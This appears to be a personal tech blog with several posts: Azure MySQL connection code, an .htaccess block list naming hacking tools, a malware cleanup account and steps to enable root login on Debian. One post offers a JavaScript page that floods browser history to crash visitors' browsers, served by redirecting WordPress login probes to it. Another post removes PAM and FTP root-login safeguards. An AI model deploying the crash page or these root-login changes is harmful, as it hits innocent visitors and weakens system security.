27 February 2017

Azure and MySQL in App for PHP connections


Microsoft Azure can provide a MySQL instance alongside a web application, without the need to use ClearDB or a dedicated MySQL server. It's one database instance that is not really meant for high production needs.

This is great for use with Joomla or WordPress. It's also good for developing or deploying PHP-based applications that use MySQL.

The issue is with setting your PHP application to connect to the database. You do not create a database when using this option; you use the database that is provided, and you have to connect to that database.

Here is some code to establish that database connection:

<?php

// Azure MySql Connection Strings

$connectstr_dbhost = '';
$connectstr_dbname = '';
$connectstr_dbusername = '';
$connectstr_dbpassword = '';

foreach ($_SERVER as $key => $value) {
    if (strpos($key, "MYSQLCONNSTR_localdb") !== 0) {
        continue;
    }
   
    $connectstr_dbhost = preg_replace("/^.*Data Source=(.+?);.*$/", "\\1", $value);
    $connectstr_dbname = preg_replace("/^.*Database=(.+?);.*$/", "\\1", $value);
    $connectstr_dbusername = preg_replace("/^.*User Id=(.+?);.*$/", "\\1", $value);
    $connectstr_dbpassword = preg_replace("/^.*Password=(.+?)$/", "\\1", $value);
}

// DB connection info
$host = $connectstr_dbhost;
$user = $connectstr_dbusername;
$pwd = $connectstr_dbpassword;
$db = $connectstr_dbname;

// ... rest of your application ...

?>

If you are configuring WordPress, you would set it up like this:

define('DB_NAME', $connectstr_dbname);
define('DB_USER', $connectstr_dbusername);
define('DB_PASSWORD', $connectstr_dbpassword);
define('DB_HOST', $connectstr_dbhost);


Run the first part of the code to extract the host, database name, username, and password from the connection string. You can then assign those values to the variables your PHP code uses, or use them directly.

You can alter this to define the variables with the names that your PHP code uses and set them in the foreach statement, eliminating the 'DB connection info' section of this code.


16 February 2017

Firefox 40.1 and WordPress attacks


There are many attempts to brute force the WordPress login page against websites that are not running WordPress.

Looking at an Apache access log, there seem to be many of these entries:

187.108.232.211 - - [15/Feb/2017:10:12:44 -0700] "GET /wp-login.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
187.108.232.211 - - [15/Feb/2017:10:12:44 -0700] "GET / HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"


All of these probes for the WordPress login page have one thing in common: they all report Firefox 40.1 as the User-Agent.

This makes them an easy target for blocking in an .htaccess file.

Here is an example of an .htaccess file to block many of these tools and robots:


## No directory listings
IndexIgnore *

## Can be commented out if causes errors, see notes above.
Options +FollowSymLinks
Options -Indexes

## Mod_rewrite in use.
RewriteEngine On
RewriteBase /


## Block Hacking Tools and Miscreant bots by User-Agent
SetEnvIfNoCase User-Agent "^-?$" scum
# wp-login User-Agent
SetEnvIfNoCase User-Agent "Firefox/40.1" tool
# ZED User-Agent (39.0) and others

# All versions of Firefox prior to 40.0 are blocked
SetEnvIfNoCase User-Agent Firefox\/[1-3]?[0-9]\.[0-9] tool
# BurpSuite spider User-Agent
SetEnvIfNoCase User-Agent "Trident/5.0" tool
SetEnvIfNoCase User-Agent "Arachni" tool
# Ruby-based web scraper
SetEnvIfNoCase User-Agent "Mechanize" tool
SetEnvIfNoCase User-Agent "Nikto" tool
SetEnvIfNoCase User-Agent "scrapy-redis" tool
SetEnvIfNoCase User-Agent "SQLmap" tool
SetEnvIfNoCase User-Agent "Vega" tool
SetEnvIfNoCase User-Agent "Wget" tool
SetEnvIfNoCase User-Agent "wpscan" tool

SetEnvIfNoCase User-Agent "360Spider" scum
SetEnvIfNoCase User-Agent "AhrefsBot" scum
SetEnvIfNoCase User-Agent "ADmantX" scum
SetEnvIfNoCase User-Agent "Blexbot" scum
SetEnvIfNoCase User-Agent "Buzzbot" scum
SetEnvIfNoCase User-Agent "CRAZYWEBCRAWLER" scum
SetEnvIfNoCase User-Agent "DomainCrawler" scum
SetEnvIfNoCase User-Agent "Ezooms" scum
SetEnvIfNoCase User-Agent "GetIntent" scum
SetEnvIfNoCase User-Agent "GrapeshotCrawler" scum
SetEnvIfNoCase User-Agent "ias_crawler" scum
SetEnvIfNoCase User-Agent "James Bot" scum
SetEnvIfNoCase User-Agent "linkdexbot" scum
SetEnvIfNoCase User-Agent "ltx71" scum
SetEnvIfNoCase User-Agent "MaxPointCrawler" scum
SetEnvIfNoCase User-Agent "MJ12bot" scum
SetEnvIfNoCase User-Agent "proximic" scum
SetEnvIfNoCase User-Agent "Qwantify" scum
SetEnvIfNoCase User-Agent "RU_Bot" scum
SetEnvIfNoCase User-Agent "SEOkicks" scum
SetEnvIfNoCase User-Agent "SemrushBot" scum
SetEnvIfNoCase User-Agent "seoscanner" scum
SetEnvIfNoCase User-Agent "SiteExplorer" scum
SetEnvIfNoCase User-Agent "SISTRIX" scum
SetEnvIfNoCase User-Agent "SurdotlyBot" scum
SetEnvIfNoCase User-Agent "TestiTest1" scum
SetEnvIfNoCase User-Agent "UptimeRobot" scum
SetEnvIfNoCase User-Agent "XoviBot" scum
SetEnvIfNoCase User-Agent "YFF35" scum

Deny from env=tool
Deny from env=scum
## End - Hacking and Miscreant block



Update 9 Mar 2017:
Further research indicates that these machines are all part of a botnet and that is why they all share the same characteristics. Firefox 40.1 has never existed.
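To see how much traffic the User-Agent rules above would catch before deploying them, the same patterns can be run over an access log. This is an added example, not part of the original post: the rule subset is copied from the .htaccess above, the first two log lines are the ones quoted in the post, and the remaining lines and all function names are constructed for illustration.

```python
import re
from collections import Counter

# Apache combined log format: ip, identity, user, [time], "request", status, size, "referer", "UA".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# A subset of the page's SetEnvIfNoCase User-Agent rules, copied as written.
UA_RULES = [
    (r"^-?$", "scum"),                         # empty or "-" User-Agent
    (r"Firefox/40.1", "tool"),                 # the version that never existed
    (r"Firefox\/[1-3]?[0-9]\.[0-9]", "tool"),  # Firefox releases before 40.0
    (r"wpscan", "tool"),
    (r"MJ12bot", "scum"),
]
UA_RULES = [(re.compile(p, re.I), tag) for p, tag in UA_RULES]

def classify(user_agent):
    """Return the env variable ('tool' or 'scum') the rules would set, or None."""
    for rx, tag in UA_RULES:
        if rx.search(user_agent):
            return tag
    return None

def flagged_by_ip(lines):
    """Count, per client IP, the requests whose User-Agent trips a rule."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m and classify(m.group("ua")) is not None:
            hits[m.group("ip")] += 1
    return hits

# First two lines are from the post; the rest are constructed (documentation IP ranges).
SAMPLE_LOG = [
    '187.108.232.211 - - [15/Feb/2017:10:12:44 -0700] "GET /wp-login.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"',
    '187.108.232.211 - - [15/Feb/2017:10:12:44 -0700] "GET / HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"',
    '192.0.2.10 - - [15/Feb/2017:10:13:02 -0700] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"',
    '198.51.100.7 - - [15/Feb/2017:10:13:09 -0700] "GET /wp-login.php HTTP/1.1" 403 - "-" "-"',
    '203.0.113.4 - - [15/Feb/2017:10:13:15 -0700] "GET /index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0"',
]

if __name__ == "__main__":
    for ip, count in flagged_by_ip(SAMPLE_LOG).most_common():
        print(ip, count)
```

The constructed Firefox/38.0 line is flagged as well, which shows that the pre-40.0 rule also turns away visitors on genuinely old browsers.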
 

27 January 2017

Hackers who hit your website for wp-login.php


Ever noticed hackers trying to break into WordPress websites, even though your site isn't on the WordPress platform?

Here is a little fun for those hackers who blindly go after WordPress on every website they can find.

This script is from GitHub in reference to the crashsafari.com website. It reloads the page continuously, overwhelming the browser history. It really slows down your computer.

Copy this entire script to a document and name it secret-login.php. The title on the webpage adds a distraction for when the page loads.


<!DOCTYPE html>
<html>
<head>
<title>Setting up secret login page... Please wait</title>
</head>
<body>

<?PHP
echo "<br />";
echo "Setting up secret login page... Please wait<p />";
echo "<br />";
?>

<script>
  var total = "";
  for( var i = 0; i < 100000; i++ ) {
      total = total + i.toString();
      history.pushState(0,0, total );
  }
</script>
</body>
</html>


Save this php file to the root of your website, or wherever you like.

In your .htaccess file, add the following lines. Make sure you have the RewriteEngine on:

RewriteEngine On

Here is the good part:

# Swat them suckers away
# Usage: RedirectMatch (pattern) (location of script file)
# Shows up as 302 in the access log and is not case-sensitive
RedirectMatch (?i)wp-(login\.php|admin|content|includes) http://example.com/secret-login.php
RedirectMatch (?i)logo_img\.php http://example.com/secret-login.php
RedirectMatch (?i)xmlrpc\.php http://example.com/secret-login.php
RedirectMatch (?i)admin\.php http://example.com/secret-login.php



The pattern is matched on the entire page request. So, http://example.com/wp-admin/ will work the same as http://example.com/something/wp-admin/.

The (?i) eliminates case sensitivity in the pattern match. So, WP-LOGIN matches as well as Wp-LOgin or whatever.

The first line matches all wp-login.php, wp-admin, wp-content, or wp-includes requests to your website.

The rest of the lines are more requests from hackers seen in the logs for logo_img.php, xmlrpc.php and admin.php. Add your own file names to the list as you see fit.

They get sent to http://example.com/secret-login.php to suffer from the above script.


Obviously, don't use the wp-xxxxxx pattern if you are using WordPress.
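Because the patterns match anywhere in the request path, it is worth checking them against your own site's URLs before adding them. This is an added example, not part of the original post: the four patterns are copied from the RedirectMatch lines above, while the site paths and function names are constructed for illustration.

```python
import re

# The four RedirectMatch patterns from the post. Apache applies them as
# unanchored regular expressions against the URL path.
REDIRECT_PATTERNS = [
    r"(?i)wp-(login\.php|admin|content|includes)",
    r"(?i)logo_img\.php",
    r"(?i)xmlrpc\.php",
    r"(?i)admin\.php",
]
COMPILED = [re.compile(p) for p in REDIRECT_PATTERNS]

def matching_rule(path):
    """Return the first pattern that would redirect this URL path, else None."""
    for pattern, rx in zip(REDIRECT_PATTERNS, COMPILED):
        if rx.search(path):
            return pattern
    return None

def audit(paths):
    """Map each path that would be redirected to the pattern responsible."""
    caught = {}
    for path in paths:
        rule = matching_rule(path)
        if rule is not None:
            caught[path] = rule
    return caught

# Constructed list of a site's own legitimate URL paths (hypothetical).
SITE_PATHS = [
    "/index.php",
    "/administrator/index.php",           # contains "admin" but not "admin.php"
    "/tools/siteadmin.php",               # caught by the admin\.php pattern
    "/docs/moving-from-wp-content.html",  # caught by the wp-content alternative
    "/images/logo.png",
]

if __name__ == "__main__":
    for path, rule in audit(SITE_PATHS).items():
        print(f"{path} would be redirected by {rule}")
```

Any legitimate path reported here needs a tighter pattern, for example one anchored with ^/ so it matches only at the site root.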


16 April 2012

Wiping out Alureon from an infected laptop

I was assisting a neighbor in cleaning up her Windows-based laptop from blue-screening and redirecting Google searches. She had a Windows 7 64-bit Home Edition install.

The antivirus software on the laptop had expired, leaving it nakedly vulnerable to becoming infected, which it did.

Most of the problem apps, toolbars and malware were easily cleaned by uninstalling them and running an Rkill/ComboFix/Malwarebytes Anti-Malware session on the laptop. There was a strange file in the HKLM\...WOW64\Run section. Finding that file gave me a good clue as to when the machine had downloaded some of the problem apps. Much of the malicious software was installed on the same day, and that showed on file stamps and the dates shown with the Programs and Apps in the Control Panel.

One of the problem apps was FlipToast. It would not uninstall properly. Instead of Uninstall, I used Change and then selected to delete the application when the Install program came up.

Cleaning up Alureon was a little more problematic. It seemed to have been adding the Sirefef.B trojan to the machine. If I used Microsoft Security Essentials to clean it up, the machine would not start properly and would cause the machine to go back to a restore point, where it was still infected.

After reading the experience of others on blogs and forums, this is how I was able to clean up the machine:

Note - Don't remove any Restore Points, yet. It may take longer to scan the machine, but you may need them to get back into the machine if something fails.

I had to run some of these utilities in Safe Mode, but am unsure which ones and in what sequence. Some utilities would not work in Safe Mode, so I had to switch back and forth.



So, in Safe Mode:
- Run RKill from Bleeping Computer - http://www.bleepingcomputer.com/download/anti-virus/rkill
-- This utility stops any processes that are related to malware

- Run ComboFix from Bleeping Computer - http://www.bleepingcomputer.com/download/anti-virus/combofix
-- ComboFix is a powerful utility to identify and correct many kinds of malware

- Install and Run Malwarebytes Anti-Malware - http://download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html?part=dl-10804572&subj=dl&tag=button
-- This utility is very effective in identifying and removing toolbars, malware, spyware and other threats.

This cleaned up most of the issues. The next part was needed to get to the "root" of the issue.



Kaspersky Lab has some good utilities available for assisting in cleaning up viruses, malware and root kits (including full Rescue CDs for when you need one).

The utility used to assist in this case was TDSSKiller, found here - http://support.kaspersky.com/viruses/utility

TDSS assisted in identifying and removing the root kit that kept causing problems.

Next, I had to run the Microsoft Safety Scanner and do a full scan, which took a couple of hours, but it was worth it. You can get the Safety scanner here: http://www.microsoft.com/security/scanner/en-us/default.aspx

I then manually installed the Microsoft Security Essentials from here: http://www.microsoft.com/download/en/details.aspx?id=5201 and performed a quick scan. All was clear.

To finish, I ran a Windows Update, checked the C: volume for errors, and checked the fix issues option. Then, I removed all previous Restore Points.

It seemed to have worked, so far.

25 February 2012

Setting up Debian Squeeze, Goodbye Ubuntu


As a computer hobbyist, it is fun to try out various operating systems, including the many various flavors of Linux available to the community.

As a website administrator, setting up a LAMP (Linux-Apache-MySQL-PHP) box for the Joomla CMS (Content Management System) is part of the hobby.

I used to enjoy using Ubuntu as a platform to set all of this up. With Ubuntu 11, they changed the desktop interface to a system named Unity. It's awful!!! It would be fine if all I used was a small-screened tablet, but I use a full-sized desktop computer. The user interface is quite annoying. So, it is time to abandon Ubuntu and move on to a more satisfying distro. It's time to try out Debian, on which Ubuntu is based.

Well, Debian has some secure features that needed to be modified in order to allow for root login to the Gnome desktop and via ftp. There are a million reasons why this is discouraged and a Google search on the topic will inundate you with a million posts against setting this up.

That's all fine, but it was still something that needed to be configured for whatever reason. So, here are the steps taken to use the root account to log into the Gnome desktop using gdm3 and ProFTPD on Debian Squeeze.

To log into the Gnome desktop using gdm3:

1. Edit the /etc/gdm3/daemon.conf file
  - add the line AllowRoot=true to the [security] section
.
.
[security]
AllowRoot=true
.
.


2. Edit the /etc/pam.d/gdm3 file
 - comment out the line that reads auth required pam_succeed_if.so user != root quiet_success

The file will look like this:
#%PAM-1.0
auth    requisite       pam_nologin.so
auth    required        pam_env.so readenv=1
auth    required        pam_env.so readenv=1 envfile=/etc/default/locale
#auth   required        pam_succeed_if.so user != root quiet_success
@include common-auth
auth    optional        pam_gnome_keyring.so
@include common-account
session required        pam_limits.so
@include common-session
session optional        pam_gnome_keyring.so auto_start
@include common-password



To log into ProFTPD as root:

1. Edit the /etc/ftpusers file
 - comment out the line that says root

.
.
#root
.
.


2. Edit the /etc/proftpd/proftpd.conf file
- add the line RootLogin on to the file (can be placed at the end of the file)

.
.
# Put a comment to indicate why you added the line
RootLogin on
.
.


These file modifications allowed me to use the root account to log into the Debian machine for those services. I am posting the steps for those who need to make these modifications and do not wish to wade through pages and pages of opinions and pontifications.

Disclaimer: avoid logging into your machine as root. It is highly discouraged.
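On a machine you are reviewing, the four changes described in this post can be detected by checking the same files. This is an added example, not part of the original post: the function name and the sample file contents are constructed for illustration, and the check covers only the settings named above.

```python
import re

def audit_root_login(gdm_conf, pam_gdm3, ftpusers, proftpd_conf):
    """Return one finding per root-login relaxation from the post that is present."""
    findings = []
    # 1. gdm3 daemon.conf: AllowRoot=true inside the [security] section.
    section = None
    for line in (raw.strip() for raw in gdm_conf.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "security" and re.fullmatch(r"AllowRoot\s*=\s*true", line, re.I):
            findings.append("gdm3: AllowRoot=true")
    # 2. /etc/pam.d/gdm3: the pam_succeed_if guard that rejects root must be active.
    guard = r"^\s*auth\s+required\s+pam_succeed_if\.so\s+user\s*!=\s*root\b"
    if not re.search(guard, pam_gdm3, re.M):
        findings.append("pam.d/gdm3: root guard missing or commented out")
    # 3. /etc/ftpusers lists accounts denied FTP access; root should be listed.
    denied = {l.strip() for l in ftpusers.splitlines() if not l.lstrip().startswith("#")}
    if "root" not in denied:
        findings.append("ftpusers: root is not denied")
    # 4. proftpd.conf: RootLogin on.
    if re.search(r"^\s*RootLogin\s+on\b", proftpd_conf, re.I | re.M):
        findings.append("proftpd: RootLogin on")
    return findings

# Constructed inputs: the files as edited in the post ...
EDITED = dict(
    gdm_conf="[daemon]\n[security]\nAllowRoot=true\n",
    pam_gdm3="auth requisite pam_nologin.so\n"
             "#auth   required        pam_succeed_if.so user != root quiet_success\n"
             "@include common-auth\n",
    ftpusers="#root\ndaemon\nbin\n",
    proftpd_conf="ServerName \"Debian\"\nRootLogin on\n",
)
# ... and the same files with the restrictions left in place.
STOCK = dict(
    gdm_conf="[daemon]\n[security]\n",
    pam_gdm3="auth requisite pam_nologin.so\n"
             "auth    required        pam_succeed_if.so user != root quiet_success\n"
             "@include common-auth\n",
    ftpusers="root\ndaemon\nbin\n",
    proftpd_conf="ServerName \"Debian\"\n",
)

if __name__ == "__main__":
    for name, files in (("edited", EDITED), ("stock", STOCK)):
        print(name, audit_root_login(**files))
```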